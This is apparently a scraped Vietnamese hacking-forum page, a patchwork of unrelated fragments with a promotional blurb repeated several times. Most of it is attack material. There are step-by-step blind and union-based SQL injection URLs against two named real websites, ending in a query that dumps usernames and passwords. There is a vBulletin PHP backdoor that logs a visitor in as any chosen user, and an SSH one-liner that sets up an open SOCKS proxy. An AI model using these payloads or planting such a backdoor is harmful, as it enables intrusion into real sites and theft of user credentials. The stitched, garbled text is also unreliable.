![[IMG]](http://root.vn/up/tim-link-admin.png)
Được thêm data hơn 5000 path giúp tìm link admin login tốt hơn
https://www.mediafire.com/?ff8ub971641vb25
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.
Promo credit expires on 1/28/2014
[Info] First_Name=KenjiVN Last_Name=KenjiVN Account_Name=KenjiVN Hello_Msg=Hello Secret_Question=5 ; Secret question codes: ;1 = Mother's Maiden Name ;2 = City of Birth ;3 = Highschool Name ;4 = Name of first love ;5 = Favorite Pet ;6 = Favorite Book ;7 = Favorite TV Show ;8 = Favorite Movies ;9 = Favorite Flower ;10 = Favorite Color Secret_Answer=other |
echo y|ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa;cat ~/.ssh/id_rsa.pub > ~/.ssh/authorized_keys;ssh -fND 0.0.0.0:8888 -o StrictHostKeyChecking=no localhost
![]() |
Select content From news Where new_id=$_get[‘id’] and 1=1
Select content ,comment From news Where news_id=$_get[‘id’]
Ví dụ:ascii(A) kết quả là 65 limit(query,x,y) :Tương tự substring()
http://www.julianfantino.ca/EN/6221/114162?tpid=3920'
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=0
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=1
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)=5
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)>5
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),2,1)=0 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>64 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>65 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>99 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>100 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>77 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920
and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>78 --
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select gia tri colum from gia tri table limit 1,1),1,1))=0 --
<?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($_GET['bd']); process_new_login('cplogin', TRUE, TRUE); do_login_redirect(); } } ?> |
http://www.kemlam.com
http://www.kemlam.com/?content=detail&proID=10
http://www.kemlam.com/?content=detail&proID=10'
$query = 'select * from sanpham where id=1';
http://www.kemlam.com/?content=detail&proID=10 order by 13 --
http://www.kemlam.com/?content=detail&proID=10 order by 14 --
==>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/kemlam/domains/kemlam.com/public_html/details.phpon line 8
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13 --
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--
table:ads_vn,category_vn,cust_vn,hitcounter,notice,onlin e,pages_vn,product_vn,tinnoibat_vn,tintuc_vn,users
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,group_concat(column_name) ,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
http://www.kemlam.com/?content=detail&proID=Null%20UNION SELECT 1,2,3,4,group_concat(Username,0x2f,Pass),6,7,8,9,10,11,12,13 from users--